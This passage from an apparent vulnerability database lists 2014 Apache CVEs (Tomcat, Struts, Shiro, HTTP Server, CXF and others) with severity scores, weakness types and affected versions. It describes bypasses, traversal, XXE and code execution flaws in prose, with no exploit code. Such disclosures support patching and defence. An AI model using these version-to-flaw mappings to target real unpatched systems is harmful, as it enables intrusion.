Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache cordova_file_transfer *
apache cordova *
CVE-2014-0073 HIGH

The CDVInAppBrowser class in the Apache Cordova In-App-Browser standalone plugin (org.apache.cordova.inappbrowser) before 0.3.2 for iOS and the In-App-Browser plugin for iOS from Cordova 2.6.0 through 2.9.0 does not properly validate callback identifiers, which allows remote attackers to execute arbitrary JavaScript in the host page and consequently gain privileges via a crafted gap-iab: URI.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache cordova_in-app-browser *
apache cordova *
CVE-2014-0074 HIGH

Apache Shiro 1.x before 1.2.3, when using an LDAP server with unauthenticated bind enabled, allows remote attackers to bypass authentication via an empty (1) username or (2) password.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache shiro 1.2.2
apache shiro 1.1.0
apache shiro 1.2.0
apache shiro 1.2.1
apache shiro 1.0.0
CVE-2014-0075 MEDIUM

Integer overflow in the parseChunkHeader function in java/org/apache/coyote/http11/filters/ChunkedInputFilter.java in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4 allows remote attackers to cause a denial of service (resource consumption) via a malformed chunk size in chunked transfer coding of a request during the streaming of data.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-189,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 6.0
apache tomcat 6.0.7
apache tomcat 7.0.44
apache tomcat 6.0.1
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 8.0.3
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 6.0.12
apache tomcat 6.0.37
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 7.0.31
apache tomcat 6.0.36
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 6.0.17
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 7.0.36
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 6.0.13
apache tomcat 7.0.23
apache tomcat *
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 7.0.46
apache tomcat 7.0.7
apache tomcat 7.0.29
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 6.0.30
apache tomcat 8.0.1
apache tomcat 6
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 7.0.52
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 7.0.22
apache tomcat 6.0.3
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.35
CVE-2014-0094 MEDIUM

The ParametersInterceptor in Apache Struts before 2.3.16.2 allows remote attackers to "manipulate" the ClassLoader via the class parameter, which is passed to the getClass method.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache struts *
CVE-2014-0095 MEDIUM

java/org/apache/coyote/ajp/AbstractAjpProcessor.java in Apache Tomcat 8.x before 8.0.4 allows remote attackers to cause a denial of service (thread consumption) by using a "Content-Length: 0" AJP request to trigger a hang in request processing.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache tomcat 8.0.0
apache tomcat 8.0.1
apache tomcat 8.0.3
CVE-2014-0096 MEDIUM

java/org/apache/catalina/servlets/DefaultServlet.java in the default servlet in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4 does not properly restrict XSLT stylesheets, which allows remote attackers to bypass security-manager restrictions and read arbitrary files via a crafted web application that provides an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 6.0
apache tomcat 6.0.7
apache tomcat 7.0.44
apache tomcat 6.0.1
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 8.0.3
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 6.0.12
apache tomcat 6.0.37
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 7.0.31
apache tomcat 6.0.36
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 6.0.17
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 7.0.36
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 6.0.13
apache tomcat 7.0.23
apache tomcat *
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 7.0.46
apache tomcat 7.0.7
apache tomcat 7.0.29
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 6.0.30
apache tomcat 8.0.1
apache tomcat 6
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 7.0.52
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 7.0.22
apache tomcat 6.0.3
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.35
CVE-2014-0098 MEDIUM

The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server before 2.4.8 allows remote attackers to cause a denial of service (segmentation fault and daemon crash) via a crafted cookie that is not properly handled during truncation.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
oracle secure_global_desktop 4.71
oracle secure_global_desktop 5.0
canonical ubuntu_linux 10.04
oracle http_server 11.1.1.7.0
oracle http_server 12.1.3.0
canonical ubuntu_linux 12.04
oracle secure_global_desktop 4.63
canonical ubuntu_linux 12.10
canonical ubuntu_linux 13.10
oracle http_server 10.1.3.5.0
oracle secure_global_desktop 5.1
oracle http_server 12.1.2.0
CVE-2014-0099 MEDIUM

Integer overflow in java/org/apache/tomcat/util/buf/Ascii.java in Apache Tomcat before 6.0.40, 7.x before 7.0.53, and 8.x before 8.0.4, when operated behind a reverse proxy, allows remote attackers to conduct HTTP request smuggling attacks via a crafted Content-Length HTTP header.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-189,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 6.0
apache tomcat 6.0.7
apache tomcat 7.0.44
apache tomcat 6.0.1
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 8.0.3
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 6.0.12
apache tomcat 6.0.37
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 7.0.31
apache tomcat 6.0.36
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 6.0.17
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 7.0.36
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 6.0.13
apache tomcat 7.0.23
apache tomcat *
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 7.0.46
apache tomcat 7.0.7
apache tomcat 7.0.29
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 6.0.30
apache tomcat 8.0.1
apache tomcat 6
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 7.0.52
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 7.0.22
apache tomcat 6.0.3
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.35
CVE-2014-0107 HIGH

The TransformerFactory in Apache Xalan-Java before 2.7.2 does not properly restrict access to certain properties when FEATURE_SECURE_PROCESSING is enabled, which allows remote attackers to bypass expected restrictions and load arbitrary classes or access external resources via a crafted (1) xalan:content-header, (2) xalan:entities, (3) xslt:content-header, or (4) xslt:entities property, or a Java property that is bound to the XSLT 1.0 system-property function.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache xalan-java 2.4.0
apache xalan-java 2.5.2
apache xalan-java 2.6.0
oracle webcenter_sites 11.1.1.8.0
apache xalan-java 1.0.0
apache xalan-java 2.2.0
apache xalan-java 2.1.0
apache xalan-java 2.0.1
apache xalan-java 2.4.1
oracle webcenter_sites 7.6.2
apache xalan-java 2.5.0
apache xalan-java 2.5.1
apache xalan-java 2.0.0
apache xalan-java *
apache xalan-java 2.7.0
CVE-2014-0109 MEDIUM

Apache CXF before 2.6.14 and 2.7.x before 2.7.11 allows remote attackers to cause a denial of service (memory consumption) via a large request with the Content-Type set to text/html to a SOAP endpoint, which triggers an error.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache cxf 2.7.0
apache cxf 2.4.4
apache cxf 2.5.8
apache cxf 2.6.3
apache cxf 2.6.6
apache cxf 2.6.0
apache cxf 2.6.10
apache cxf 2.7.4
apache cxf 2.7.9
apache cxf 2.7.5
apache cxf 2.7.7
apache cxf 2.6.9
apache cxf 2.5.9
apache cxf 2.6.8
apache cxf 2.4.0
apache cxf 2.5.2
apache cxf 2.7.10
apache cxf 2.7.3
apache cxf 2.4.6
apache cxf 2.7.2
apache cxf 2.6.11
apache cxf 2.4.5
apache cxf 2.6.4
apache cxf 2.6.7
apache cxf 2.5.0
apache cxf 2.5.5
apache cxf 2.6.12
apache cxf 2.5.6
apache cxf 2.6.5
apache cxf 2.5.3
apache cxf 2.4.7
apache cxf 2.6.1
apache cxf 2.4.1
apache cxf 2.4.3
apache cxf 2.7.1
apache cxf *
apache cxf 2.5.1
apache cxf 2.5.4
apache cxf 2.6.2
apache cxf 2.5.7
apache cxf 2.4.2
apache cxf 2.7.6
apache cxf 2.7.8
CVE-2014-0110 MEDIUM

Apache CXF before 2.6.14 and 2.7.x before 2.7.11 allows remote attackers to cause a denial of service (/tmp disk consumption) via a large invalid SOAP message.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache cxf 2.7.0
apache cxf 2.4.4
apache cxf 2.5.8
apache cxf 2.6.3
apache cxf 2.6.6
apache cxf 2.6.0
apache cxf 2.6.10
apache cxf 2.7.4
apache cxf 2.7.9
apache cxf 2.7.5
apache cxf 2.7.7
apache cxf 2.6.9
apache cxf 2.5.9
apache cxf 2.6.8
apache cxf 2.4.0
apache cxf 2.5.2
apache cxf 2.7.10
apache cxf 2.7.3
apache cxf 2.4.6
apache cxf 2.7.2
apache cxf 2.6.11
apache cxf 2.4.5
apache cxf 2.6.4
apache cxf 2.6.7
apache cxf 2.5.0
apache cxf 2.5.5
apache cxf 2.6.12
apache cxf 2.5.6
apache cxf 2.6.5
apache cxf 2.5.3
apache cxf 2.4.7
apache cxf 2.6.1
apache cxf 2.4.1
apache cxf 2.4.3
apache cxf 2.7.1
apache cxf *
apache cxf 2.5.1
apache cxf 2.5.4
apache cxf 2.6.2
apache cxf 2.5.7
apache cxf 2.4.2
apache cxf 2.7.6
apache cxf 2.7.8
CVE-2014-0111 MEDIUM

Apache Syncope 1.0.0 before 1.0.9 and 1.1.0 before 1.1.7 allows remote administrators to execute arbitrary Java code via vectors related to Apache Commons JEXL expressions, "derived schema definition," "user / role templates," and "account links of resource mappings."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache syncope *
CVE-2014-0112 HIGH

ParametersInterceptor in Apache Struts before 2.3.20 does not properly restrict access to the getClass method, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache struts *
CVE-2014-0113 HIGH

CookieInterceptor in Apache Struts before 2.3.20, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache struts *
CVE-2014-0114 HIGH

Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 1.2.4
apache struts 1.2.7
apache struts 1.3.5
apache commons_beanutils *
apache struts 1.0.2
apache struts 1.2.9
apache struts 1.3.8
apache struts 1.2.2
apache struts 1.2.6
apache struts 1.3.10
apache struts 1.2.8
apache struts 1.1
apache struts 1.0
CVE-2014-0115 HIGH

Directory traversal vulnerability in the log viewer in Apache Storm 0.9.0.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter to log.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache storm 0.9.0.1
CVE-2014-0116 MEDIUM

CookieInterceptor in Apache Struts 2.x before 2.3.20, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to "manipulate" the ClassLoader and modify session state via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0113.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.0.9
apache struts 2.3.14.1
apache struts 2.3.16.2
apache struts 2.1.5
apache struts 2.2.3.1
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.3
apache struts 2.3.15.2
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.3.16.1
apache struts 2.0.12
apache struts 2.0.14
apache struts 2.0.0
apache struts 2.3.15.1
apache struts 2.3.4.1
apache struts 2.3.3
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.0.8
apache struts 2.3.4
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.3.1.2
apache struts 2.2.3
apache struts 2.3.16
CVE-2014-0117 MEDIUM

The mod_proxy module in the Apache HTTP Server 2.4.x before 2.4.10, when a reverse proxy is enabled, allows remote attackers to cause a denial of service (child-process crash) via a crafted HTTP Connection header.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache http_server 2.4.7
apple mac_os_x *
apache http_server 2.4.8
apache http_server 2.4.9
apache http_server 2.4.6
CVE-2014-0118 MEDIUM

The deflate_in_filter function in mod_deflate.c in the mod_deflate module in the Apache HTTP Server before 2.4.10, when request body decompression is enabled, allows remote attackers to cause a denial of service (resource consumption) via crafted request data that decompresses to a much larger size.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache http_server *
redhat jboss_enterprise_application_platform 6.0.0
redhat jboss_enterprise_application_platform 6.4.0
debian debian_linux 7.0
debian debian_linux 8.0
CVE-2014-0119 MEDIUM

Apache Tomcat before 6.0.40, 7.x before 7.0.54, and 8.x before 8.0.6 does not properly constrain the class loader that accesses the XML parser used with an XSLT stylesheet, which allows remote attackers to (1) read arbitrary files via a crafted web application that provides an XML external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, or (2) read files associated with different web applications on a single Tomcat instance via a crafted web application.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 6.0
apache tomcat 6.0.7
apache tomcat 7.0.44
apache tomcat 6.0.1
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 8.0.3
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 6.0.12
apache tomcat 6.0.37
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 7.0.31
apache tomcat 6.0.36
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 8.0.5
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 6.0.17
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 7.0.36
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 6.0.13
apache tomcat 7.0.23
apache tomcat *
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 7.0.46
apache tomcat 7.0.7
apache tomcat 7.0.29
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 6.0.30
apache tomcat 8.0.1
apache tomcat 6
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 7.0.52
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 7.0.53
apache tomcat 7.0.22
apache tomcat 6.0.3
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.35
CVE-2014-0212 MEDIUM

qpid-cpp: ACL policies only loaded if the acl-file option specified enabling DoS by consuming all available file descriptors

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache qpid-cpp -
CVE-2014-0219 LOW

Apache Karaf before 4.0.10 enables a shutdown port on the loopback interface, which allows local users to cause a denial of service (shutdown) by sending a shutdown command to all listening high ports.

CVSS 2.0

Severity: LOW

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache karaf *
CVE-2014-0226 MEDIUM

Race condition in the mod_status module in the Apache HTTP Server before 2.4.10 allows remote attackers to cause a denial of service (heap-based buffer overflow), or possibly obtain sensitive credential information or execute arbitrary code, via a crafted request that triggers improper scoreboard handling within the status_handler function in modules/generators/mod_status.c and the lua_ap_scoreboard_worker function in modules/lua/lua_request.c.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-362,

Products Affected

Vendor Product Version
oracle enterprise_manager_ops_center 12.1.4
apache http_server *
oracle secure_global_desktop 4.71
oracle secure_global_desktop 5.0
redhat jboss_enterprise_application_platform 6.0.0
debian debian_linux 7.0
oracle http_server 11.1.1.7.0
oracle http_server 12.1.3.0
oracle enterprise_manager_ops_center 11.1.3
debian debian_linux 8.0
oracle secure_global_desktop 4.63
redhat jboss_enterprise_application_platform 6.4.0
oracle http_server 10.1.3.5.0
oracle secure_global_desktop 5.1
oracle http_server 12.1.2.0
CVE-2014-0227 MEDIUM

java/org/apache/coyote/http11/filters/ChunkedInputFilter.java in Apache Tomcat 6.x before 6.0.42, 7.x before 7.0.55, and 8.x before 8.0.9 does not properly handle attempts to continue reading data after an error has occurred, which allows remote attackers to conduct HTTP request smuggling attacks or cause a denial of service (resource consumption) by streaming data with malformed chunked transfer coding.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-19,

Products Affected

Vendor Product Version
apache tomcat 7.0.47
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 6.0.7
apache tomcat 7.0.44
apache tomcat 6.0.1
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 8.0.3
apache tomcat 6.0.8
apache tomcat 6.0.29
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 6.0.12
apache tomcat 6.0.37
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 7.0.33
apache tomcat 7.0.31
apache tomcat 6.0.36
apache tomcat 6.0.15
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 8.0.5
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 7.0.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 6.0.17
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.25
apache tomcat 7.0.36
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 6.0.13
apache tomcat 7.0.23
apache tomcat 7.0.9
apache tomcat 7.0.19
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 6.0.39
apache tomcat 7.0.46
apache tomcat 7.0.7
apache tomcat 7.0.29
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 6.0.31
apache tomcat 7.0.20
apache tomcat 6.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 6.0.30
apache tomcat 8.0.1
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.10
apache tomcat 7.0.6
apache tomcat 8.0.8
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 7.0.52
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 7.0.53
apache tomcat 7.0.22
apache tomcat 6.0.3
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.35
apache tomcat 6.0.41
CVE-2014-0228 LOW

Apache Hive before 0.13.1, when in SQL standards based authorization mode, does not properly check the file permissions for (1) import and (2) export statements, which allows remote authenticated users to obtain sensitive information via a crafted URI.

CVSS 2.0

Severity: LOW

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache hive *
CVE-2014-0229 MEDIUM

Apache Hadoop 0.23.x before 0.23.11 and 2.x before 2.4.1, as used in Cloudera CDH 5.0.x before 5.0.2, do not check authorization for the (1) refreshNamenodes, (2) deleteBlockPool, and (3) shutdownDatanode HDFS admin commands, which allows remote authenticated users to cause a denial of service (DataNodes shutdown) or perform unnecessary operations by issuing a command.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache hadoop 0.23.5
apache hadoop 2.0.5
apache hadoop 2.1.0
apache hadoop 0.23.4
apache hadoop 0.23.3
apache hadoop 2.1.1
cloudera cdh 5.0.0
apache hadoop 2.0.2
apache hadoop 0.23.8
apache hadoop 2.3.0
apache hadoop 0.23.10
apache hadoop 2.0.4
apache hadoop 0.23.7
apache hadoop 2.0.0
apache hadoop 2.4.0
apache hadoop 2.2.0
apache hadoop 0.23.0
apache hadoop 2.0.6
apache hadoop 2.0.3
apache hadoop 0.23.1
apache hadoop 0.23.9
apache hadoop 2.0.1
apache hadoop 0.23.6
CVE-2014-0230 HIGH

Apache Tomcat 6.x before 6.0.44, 7.x before 7.0.55, and 8.x before 8.0.9 does not properly handle cases where an HTTP response occurs before finishing the reading of an entire request body, which allows remote attackers to cause a denial of service (thread consumption) via a series of aborted upload attempts.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache tomcat 7.0.44
apache tomcat 6.0.43
oracle virtualization 5.1
apache tomcat 8.0.3
apache tomcat 6.0.29
apache tomcat 6.0.37
apache tomcat 7.0.33
apache tomcat 6.0.36
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.36
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 6.0.30
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.6
apache tomcat 8.0.8
oracle virtualization 4.63
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 6.0.24
apache tomcat 7.0.53
apache tomcat 6.0.3
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.41
apache tomcat 7.0.47
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 6.0.7
apache tomcat 6.0.1
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 6.0.8
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 6.0.12
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 7.0.31
apache tomcat 6.0.15
apache tomcat 8.0.5
apache tomcat 7.0.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.17
apache tomcat 7.0.25
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 7.0.19
apache tomcat 6.0.39
apache tomcat 7.0.46
apache tomcat 7.0.29
oracle virtualization 4.71
apache tomcat 6.0.6
apache tomcat 7.0.20
apache tomcat 6.0.10
